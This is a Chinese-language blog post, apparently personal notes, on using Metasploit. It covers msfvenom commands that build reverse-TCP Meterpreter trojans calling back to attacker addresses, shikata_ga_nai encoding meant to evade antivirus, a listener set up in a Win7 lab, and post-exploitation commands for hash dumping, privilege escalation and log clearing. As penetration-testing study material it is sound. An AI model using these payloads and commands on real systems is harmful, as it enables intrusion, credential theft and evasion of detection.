type
Post
status
Published
date
Nov 13, 2023
slug
env/msf
summary
msf,msfvenom,meterpreter基础命令,参数解释,基本使用
tags
工具和环境配置
category
网络安全
icon
password
一.msf攻击命令
help /? | 查看帮助 | ㅤ |
search | 查找漏洞和利用数据库 | exploit-db.com更全 |
use | 使用模块 | ㅤ |
show options | 查看模块配置参数 | ㅤ |
set | 设置参数值 | ㅤ |
run/exploit | 执行模块 | ㅤ |
background | 将shell(meterpreter)放入后台 | ㅤ |
back | 退回msf6>主界面 | ㅤ |
sessions和jobs
sessions 命令用于查看和管理通过漏洞利用获得的会话jobs 主要用于管理在 Metasploit 中运行的后台任务run/exploit返回meterpreter后,msf会将会话建立起来。
background将shell放入后台通过
sessions查看使用
sessions -i <ID>进入到一个特定的会话jobs的使用类似以下这样,
use auxiliary/scanner/portscan/tcp
set RHOSTS <目标IP>
run -j将任务放入后台执行使用
jobs命令查看后台任务列表jobs -i <ID>进入一个后台任务jobs -k <ID>中止一个后台任务show

search
查询详细参数 search -h
searchsploit可以直接在exploit-db.com中查询
二.msfvenom生成木马
- p <模块路径>/<平台>/<架构>/<Payload类型>基于windows和linux的基础木马制作:
msfvenom -p windows/meterpreter/reverse_tcp lhost=1.1.1.1 lport=5555 -f exe -o test.exemsfvenom -p linux/x86/meterpreter/reverse_tcp lhost=1.1.1.1 lport=5555 -f elf -o test.elf举例:
msfvenom -p windows/meterpreter/reverse_tcp lhost=1.1.1.1 lport=5555 -e x86/shikata_ga_nai -i 6 -b '\x00' -f c -o shell.c
p windows/meterpreter/reverse_tcp:- 指定生成 Meterpreter 反向 TCP shell 的 Payload,适用于 Windows 系统。
LHOST=1.1.1.1和LPORT=5555:- 设置 Meterpreter 将要连接的监听地址(
LHOST)和监听端口(LPORT)。在这里,1.1.1.1表示攻击者的 IP 地址,5555是监听端口。
e x86/shikata_ga_nai:- 使用 Shikata Ga Nai 编码器来混淆生成的 Payload,使其更难被杀毒软件检测。
x86/shikata_ga_nai是针对 x86 架构的 Shikata Ga Nai 编码器。
i 6:- 设置编码迭代次数为 6。这表示 Payload 将会经过 6 次编码。
b '\x00':- 指定不包含空字节 (
\x00)。这是因为在许多情况下,空字节可能会导致 Payload 在某些环境中失效。
f c:- 指定输出格式为 C 语言代码。
o shell.c:- 指定输出文件名为
shell.c,将生成的 C 语言代码保存到这个文件中。



三、msfvenom + msf使用
在kali里生成基础木马(默认是x86架构,不选择)
msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.245.132 LPORT=4444 -f exe -o win.exe将win.exe丢入win7里面。
开启监听:
msfconsole
use exploit/multi/handler
set lhost 192.168.245.132
set lport 4444
run
此时点击win7里面的exe文件即可。

四、meterpreter
输入
?直接查看所有命令常用的命令:
查看用户权限 | getuid |
获取hash密码 | hashdump |
上传文件 | upload 文件名 |
执行系统命令 | execute -f <command> -i -H |
获取shell | shell |
查看目标机器系统信息 | sysinfo |
在目标主机搜寻文件 | search -f xxxxx |
提取 | getsystem |
清楚痕迹 | clearev |
execute命令详解:
- c(我没成功):- 用于指定执行的命令字符串。
execute -c "echo Hello, Meterpreter!"
- i或者- H:H主要用于隐藏命令提示符窗口,而i可以隐藏其他可执行文件的窗口。
-m参数用于指定要执行的 Meterpreter 脚本。execute -m /root/scripts/myscript.rb
以下这个命令告诉我们哪些本地exploit可能利用成功
run post/multi/recon/local_exploit_suggester

手机命令
send_sms 发送信息到手机
app_list 列出安卓手机应用
app_run <package name> 打开应用
